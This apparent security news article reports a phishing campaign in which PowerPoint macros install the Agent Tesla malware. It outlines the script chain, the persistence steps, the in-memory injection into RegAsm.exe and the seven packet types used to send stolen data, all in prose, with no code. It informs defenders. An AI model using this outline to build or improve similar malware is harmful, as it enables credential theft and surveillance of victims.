Home SECURITY Scammers use PowerPoint macros to install Agent Tesla

Scammers use PowerPoint macros to install Agent Tesla

Scammers use PowerPoint macros to install Agent Tesla

The organizers of the malicious campaign send emails with malware to Korean users.


A new variant of the Agent Tesla malware was used in an ongoing phishing campaign. According to experts from Fortinet, attackers send out emails to Korean users purportedly containing “order” details. The emails contain malicious Microsoft PowerPoint documents.

When opened, the file does not present any slides, but instead triggers an automatic VBA function to execute the HTML resource on the remote site. After executing the escaped VBScript code, a cybercriminal can use a number of scripts, including PowerShell, to silently install Agent Tesla.

Experts found the following scripts and described their functions:

  • VBScript-embedded-in-HTML – Updates malware every two hours (if possible) by adding a command line command to the task scheduler.
  • VBS Standalone File – Downloads a new base64 encoded VBS file and adds it to the startup folder for persistence.
  • Second Standalone VBS File – Downloads Agent Tesla and generates PowerShell code.
  • PowerShell Code – Executed to call the new ClassLibrary3.Class1.Run () function, which cleans up the process by passing the Agent Tesla payload in memory.

The malware injects itself into a legitimate Microsoft .NET executable file RegAsm.exe using four Windows API functions. By embedding a file in RegAsm.exe, Agent Tesla can run on an infected system without files, so the chances of being detected are significantly reduced.

Agent Tesla has keylogger features, can take screenshots, and is capable of stealing browser cookies and saved credentials, as well as clipboard data. An attacker can choose which features to enable at compile time of the payload, thereby choosing between a balance of power and stealth.

In total, Agent Tesla can receive data from more than 70 applications. When it comes to sending the collected data, malware can accomplish this task in four ways: HTTP Post, FTP Upload, SMTP, and Telegram. Each packet sent has a number indicating its type, and there are seven types of packets in total:

  • Package “0” is the first package that informs the attacker about the launch of Agent Tesla.
  • Packet “1” is sent every 120 seconds and reports that the malware is active.
  • Packet “2” is sent every 60 seconds and contains only “header” data. Agent Tesla reads the response and checks if it contains uninstall. If so, Agent Tesla is removed from the victim’s system, including all generated files and registry keys, and ends the process.
  • Package “3” sends the victim’s keystrokes (keylogger data) and stolen clipboard data.
  • Package “4” sends the captured screenshots.
  • Package “5” sends credentials stolen from software clients.
  • Package 6 sends cookies in a ZIP archive.

Source link



Please enter your comment!
Please enter your name here